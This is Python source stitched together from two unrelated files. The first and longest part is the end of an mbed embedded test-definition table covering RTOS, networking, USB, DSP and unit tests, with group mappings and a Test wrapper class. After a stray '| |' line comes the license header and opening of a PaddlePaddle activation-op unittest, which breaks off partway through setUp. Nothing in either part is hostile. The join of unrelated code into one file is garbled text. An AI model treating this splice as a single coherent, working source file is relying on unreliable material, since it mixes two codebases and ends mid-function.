#"host_test": "wait_us_auto"
},
{
"id": "MBED_35", "description": "SPI C12832 display",
"source_dir": join(TEST_DIR, "mbed", "spi_C12832"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'C12832')],
"peripherals": ["C12832"],
"automated": True,
"duration": 10,
},
{
"id": "MBED_36", "description": "WFI correct behavior",
"source_dir": join(TEST_DIR, "mbed", "wfi"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": False
},
{
"id": "MBED_37", "description": "Serial NC RX",
"source_dir": join(TEST_DIR, "mbed", "serial_nc_rx"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True
},
{
"id": "MBED_38", "description": "Serial NC TX",
"source_dir": join(TEST_DIR, "mbed", "serial_nc_tx"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True
},
{
"id": "MBED_39", "description": "Serial Complete",
"source_dir": join(TEST_DIR, "mbed", "serial_complete"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True
},
# CMSIS RTOS tests
{
"id": "CMSIS_RTOS_1", "description": "Basic",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "basic"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
},
{
"id": "CMSIS_RTOS_2", "description": "Mutex",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "mutex"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
"duration": 20
},
{
"id": "CMSIS_RTOS_3", "description": "Semaphore",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "semaphore"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
"duration": 20
},
{
"id": "CMSIS_RTOS_4", "description": "Signals",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "signals"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
},
{
"id": "CMSIS_RTOS_5", "description": "Queue",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "queue"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
"duration": 20
},
{
"id": "CMSIS_RTOS_6", "description": "Mail",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "mail"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
"duration": 20
},
{
"id": "CMSIS_RTOS_7", "description": "Timer",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "timer"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
},
{
"id": "CMSIS_RTOS_8", "description": "ISR",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "isr"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
},
# mbed RTOS tests
{
"id": "RTOS_1", "description": "Basic thread",
"source_dir": join(TEST_DIR, "rtos", "mbed", "basic"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto",
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE", "NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_2", "description": "Mutex resource lock",
"source_dir": join(TEST_DIR, "rtos", "mbed", "mutex"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"duration": 20,
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE", "NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG",
"NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_3", "description": "Semaphore resource lock",
"source_dir": join(TEST_DIR, "rtos", "mbed", "semaphore"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"duration": 20,
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE", "NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG",
"NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_4", "description": "Signals messaging",
"source_dir": join(TEST_DIR, "rtos", "mbed", "signals"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE", "NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG",
"NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_5", "description": "Queue messaging",
"source_dir": join(TEST_DIR, "rtos", "mbed", "queue"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE",
"NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_6", "description": "Mail messaging",
"source_dir": join(TEST_DIR, "rtos", "mbed", "mail"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE",
"NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_7", "description": "Timer",
"source_dir": join(TEST_DIR, "rtos", "mbed", "timer"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto",
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE",
"NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_8", "description": "ISR (Queue)",
"source_dir": join(TEST_DIR, "rtos", "mbed", "isr"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE",
"NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_9", "description": "SD File write-read",
"source_dir": join(TEST_DIR, "rtos", "mbed", "file"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"peripherals": ["SD"],
"mcu": ["LPC1768", "LPC11U24", "LPC812", "KL25Z",
"KL05Z", "K64F", "KL46Z", "RZ_A1H",
"DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "NUCLEO_F401RE", "NUCLEO_F410RB", "DISCO_F469NI"],
},
# Networking Tests
{
"id": "NET_1", "description": "TCP client hello world",
"source_dir": join(TEST_DIR, "net", "helloworld", "tcpclient"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"duration": 15,
"automated": True,
"peripherals": ["ethernet"],
},
{
"id": "NET_2", "description": "NIST Internet Time Service",
"source_dir": join(TEST_DIR, "net", "helloworld", "udpclient"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"duration": 15,
"automated": True,
"peripherals": ["ethernet"],
},
{
"id": "NET_3", "description": "TCP echo server",
"source_dir": join(TEST_DIR, "net", "echo", "tcp_server"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
#"host_test" : "tcpecho_server_auto",
"peripherals": ["ethernet"],
},
{
"id": "NET_4", "description": "TCP echo client",
"source_dir": join(TEST_DIR, "net", "echo", "tcp_client"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
#"host_test": "tcpecho_client_auto",
"peripherals": ["ethernet"]
},
{
"id": "NET_5", "description": "UDP echo server",
"source_dir": join(TEST_DIR, "net", "echo", "udp_server"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
#"host_test" : "udpecho_server_auto",
"peripherals": ["ethernet"]
},
{
"id": "NET_6", "description": "UDP echo client",
"source_dir": join(TEST_DIR, "net", "echo", "udp_client"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
#"host_test" : "udpecho_client_auto",
"peripherals": ["ethernet"],
},
{
"id": "NET_7", "description": "HTTP client hello world",
"source_dir": join(TEST_DIR, "net", "protocols", "HTTPClient_HelloWorld"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
"duration": 15,
"peripherals": ["ethernet"],
},
{
"id": "NET_8", "description": "NTP client",
"source_dir": join(TEST_DIR, "net", "protocols", "NTPClient_HelloWorld"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
"peripherals": ["ethernet"],
},
{
"id": "NET_9", "description": "Multicast Send",
"source_dir": join(TEST_DIR, "net", "helloworld", "multicast_send"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"peripherals": ["ethernet"],
},
{
"id": "NET_10", "description": "Multicast Receive",
"source_dir": join(TEST_DIR, "net", "helloworld", "multicast_receive"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"peripherals": ["ethernet"],
},
{
"id": "NET_11", "description": "Broadcast Send",
"source_dir": join(TEST_DIR, "net", "helloworld", "broadcast_send"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"peripherals": ["ethernet"],
},
{
"id": "NET_12", "description": "Broadcast Receive",
"source_dir": join(TEST_DIR, "net", "helloworld", "broadcast_receive"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"peripherals": ["ethernet"],
},
{
"id": "NET_13", "description": "TCP client echo loop",
"source_dir": join(TEST_DIR, "net", "echo", "tcp_client_loop"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
"duration": 15,
#"host_test": "tcpecho_client_auto",
"peripherals": ["ethernet"],
},
{
"id": "NET_14", "description": "UDP PHY/Data link layer",
"source_dir": join(TEST_DIR, "net", "echo", "udp_link_layer"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"automated": False,
"duration": 20,
"host_test": "udp_link_layer_auto",
"peripherals": ["ethernet"],
},
# u-blox tests
{
"id": "UB_1", "description": "u-blox USB modem: HTTP client",
"source_dir": [join(TEST_DIR, "net", "cellular", "http", "ubloxusb"), join(TEST_DIR, "net", "cellular", "http", "common")],
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, USB_HOST_LIBRARIES, UBLOX_LIBRARY],
"supported": CORTEX_ARM_SUPPORT,
},
{
"id": "UB_2", "description": "u-blox USB modem: SMS test",
"source_dir": [join(TEST_DIR, "net", "cellular", "sms", "ubloxusb"), join(TEST_DIR, "net", "cellular", "sms", "common")],
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, USB_HOST_LIBRARIES, UBLOX_LIBRARY],
"supported": CORTEX_ARM_SUPPORT,
},
# USB Tests
{
"id": "USB_1", "description": "Mouse",
"source_dir": join(TEST_DIR, "usb", "device", "basic"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_2", "description": "Keyboard",
"source_dir": join(TEST_DIR, "usb", "device", "keyboard"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_3", "description": "Mouse_Keyboard",
"source_dir": join(TEST_DIR, "usb", "device", "keyboard"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_4", "description": "Serial Port",
"source_dir": join(TEST_DIR, "usb", "device", "serial"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
"supported": CORTEX_ARM_SUPPORT,
},
{
"id": "USB_5", "description": "Generic HID",
"source_dir": join(TEST_DIR, "usb", "device", "raw_hid"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_6", "description": "MIDI",
"source_dir": join(TEST_DIR, "usb", "device", "midi"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_7", "description": "AUDIO",
"source_dir": join(TEST_DIR, "usb", "device", "audio"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
# CMSIS DSP
{
"id": "CMSIS_DSP_1", "description": "FIR",
"source_dir": join(TEST_DIR, "dsp", "cmsis", "fir_f32"),
"dependencies": [MBED_LIBRARIES, DSP_LIBRARIES],
},
# mbed DSP
{
"id": "DSP_1", "description": "FIR",
"source_dir": join(TEST_DIR, "dsp", "mbed", "fir_f32"),
"dependencies": [MBED_LIBRARIES, DSP_LIBRARIES],
},
# KL25Z
{
"id": "KL25Z_1", "description": "LPTMR",
"source_dir": join(TEST_DIR, "KL25Z", "lptmr"),
"dependencies": [MBED_LIBRARIES],
"supported": CORTEX_ARM_SUPPORT,
"mcu": ["KL25Z"],
},
{
"id": "KL25Z_2", "description": "PIT",
"source_dir": join(TEST_DIR, "KL25Z", "pit"),
"dependencies": [MBED_LIBRARIES],
"supported": CORTEX_ARM_SUPPORT,
"mcu": ["KL25Z"],
},
{
"id": "KL25Z_3", "description": "TSI Touch Sensor",
"source_dir": join(TEST_DIR, "mbed", "tsi"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'TSI')],
"mcu": ["KL25Z"],
},
{
"id": "KL25Z_4", "description": "RTC",
"source_dir": join(TEST_DIR, "KL25Z", "rtc"),
"dependencies": [MBED_LIBRARIES],
"mcu": ["KL25Z"],
},
{
"id": "KL25Z_5", "description": "MMA8451Q accelerometer",
"source_dir": join(TEST_DIR, "mbed", "i2c_MMA8451Q"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'MMA8451Q')],
"mcu": ["KL25Z", "KL05Z", "KL46Z", "K20D50M"],
"automated": True,
"duration": 15,
},
# Examples
{
"id": "EXAMPLE_1", "description": "/dev/null",
"source_dir": join(TEST_DIR, "mbed", "dev_null"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test" : "dev_null_auto",
},
{
"id": "EXAMPLE_2", "description": "FS + RTOS",
"source_dir": join(TEST_DIR, "mbed", "fs"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
},
# CPPUTEST Library provides Unit testing Framework
#
# To write TESTs and TEST_GROUPs please add CPPUTEST_LIBRARY to 'dependencies'
#
# This will also include:
# 1. test runner - main function with call to CommandLineTestRunner::RunAllTests(ac, av)
# 2. Serial console object to print test result on serial port console
#
# Unit testing with cpputest library
{
"id": "UT_1", "description": "Basic",
"source_dir": join(TEST_DIR, "utest", "basic"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_2", "description": "Semihost file system",
"source_dir": join(TEST_DIR, "utest", "semihost_fs"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
"mcu": ["LPC1768", "LPC2368", "LPC11U24"]
},
{
"id": "UT_3", "description": "General tests",
"source_dir": join(TEST_DIR, "utest", "general"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_BUSIO", "description": "BusIn BusOut",
"source_dir": join(TEST_DIR, "utest", "bus"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_I2C_EEPROM_ASYNCH", "description": "I2C Asynch eeprom",
"source_dir": join(TEST_DIR, "utest", "i2c_eeprom_asynch"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_SERIAL_ASYNCH", "description": "Asynch serial test (req 2 serial peripherals)",
"source_dir": join(TEST_DIR, "utest", "serial_asynch"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_SPI_ASYNCH", "description": "Asynch spi test",
"source_dir": join(TEST_DIR, "utest", "spi_asynch"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_LP_TICKER", "description": "Low power ticker test",
"source_dir": join(TEST_DIR, "utest", "lp_ticker"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
# Tests used for target information purposes
{
"id": "DTCT_1", "description": "Simple detect test",
"source_dir": join(TEST_DIR, "mbed", "detect"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test" : "detect_auto",
},
]
# Group tests with the same goals into categories
GROUPS = {
    "core": ["MBED_A1", "MBED_A2", "MBED_A3", "MBED_A18"],
    "digital_io": ["MBED_A5", "MBED_A6", "MBED_A7", "MBED_A10", "MBED_A11"],
    "analog_io": ["MBED_A8"],
    "i2c": ["MBED_A19", "MBED_A20"],
    "spi": ["MBED_A12"],
}

# Derived groups computed from the TESTS table above.
GROUPS["rtos"] = [test["id"] for test in TESTS if test["id"].startswith("RTOS_")]
GROUPS["net"] = [test["id"] for test in TESTS if test["id"].startswith("NET_")]
GROUPS["automated"] = [test["id"] for test in TESTS if test.get("automated", False)]

# Look for 'TEST_GROUPS' in mbed_settings.py and update the GROUPS dictionary
# with the information in test_groups if found
try:
    from mbed_settings import TEST_GROUPS
except ImportError:
    # mbed_settings.py is optional, so a missing module falls back to an
    # empty mapping.  The original bare ``except:`` also hid genuine
    # errors *inside* mbed_settings.py; catching only ImportError keeps
    # the best-effort behavior while surfacing real bugs.
    TEST_GROUPS = {}

GROUPS.update(TEST_GROUPS)
class Test:
    """Wrapper around one entry of the TESTS table.

    Missing optional properties are filled in from Test.DEFAULTS, and a
    read-only dict-like view is provided through __getitem__ so callers
    can use either attribute or subscript access.
    """

    # Defaults for optional per-test properties.  'mcu' and 'supported'
    # are deliberately left out: is_supported() distinguishes a missing
    # attribute (no restriction) from a present one via hasattr().
    DEFAULTS = {
        #'mcu': None,
        'description': None,
        'dependencies': None,
        'duration': 10,
        'host_test': 'host_test',
        'automated': False,
        'peripherals': None,
        #'supported': None,
        'source_dir': None,
        'extra_files': None
    }

    # Keys served by __getitem__; any other key yields None, matching
    # the original elif chain's fall-through behavior.
    _KEYS = frozenset(("id", "mcu", "exclude_mcu", "dependencies",
                       "description", "duration", "host_test", "automated",
                       "peripherals", "supported", "source_dir",
                       "extra_files"))

    def __init__(self, n):
        """Wrap TESTS[n], filling unspecified fields from DEFAULTS."""
        self.n = n
        self.__dict__.update(Test.DEFAULTS)
        self.__dict__.update(TESTS[n])

    def is_supported(self, target, toolchain):
        """Return True when this test can run on `target` with `toolchain`.

        An 'mcu' whitelist and an 'exclude_mcu' blacklist are honored
        first; when a 'supported' map exists, both the target and the
        toolchain must appear in it.
        """
        if hasattr(self, 'mcu') and target not in self.mcu:
            return False
        if hasattr(self, 'exclude_mcu') and target in self.exclude_mcu:
            return False
        if not hasattr(self, 'supported'):
            return True
        return (target in self.supported) and (toolchain in self.supported[target])

    def get_description(self):
        """Return the human-readable description, falling back to the id."""
        return self.description if self.description else self.id

    def __cmp__(self, other):
        # Python 2 ordering: tests sort by their index in TESTS.
        return cmp(self.n, other.n)

    # Rich comparisons so sorting also works on Python 3, where __cmp__
    # and the cmp() builtin no longer exist.  Kept consistent with
    # __cmp__: ordering/equality is by the TESTS index.
    def __lt__(self, other):
        return self.n < other.n

    def __eq__(self, other):
        return isinstance(other, Test) and self.n == other.n

    def __hash__(self):
        # Equal tests (same index) must hash equally.
        return hash(self.n)

    def __str__(self):
        return "[%3d] %s: %s" % (self.n, self.id, self.get_description())

    def __getitem__(self, key):
        # getattr raises AttributeError for a known key whose attribute
        # was never set (e.g. 'mcu' on an unrestricted test) — identical
        # to the original chain's direct attribute access.
        if key in Test._KEYS:
            return getattr(self, key)
        return None
# Map test id -> Test wrapper for O(1) lookup by name.  A dict
# comprehension replaces the dict([(k, v) for ...]) form; duplicate ids
# (if any) keep the last entry in both versions.
TEST_MAP = {test['id']: Test(i) for i, test in enumerate(TESTS)}
| |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle.fluid.core as core
from op_test import OpTest
from scipy.special import expit, erf
class TestActivation(OpTest):
    """Base case for the activation-op tests: checks the ``exp`` op
    against the numpy reference and is subclassed by the tests below."""

    def setUp(self):
        self.op_type = "exp"
        self.dtype = np.float32
        self.init_dtype()
        self.init_kernel_type()

        x_np = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
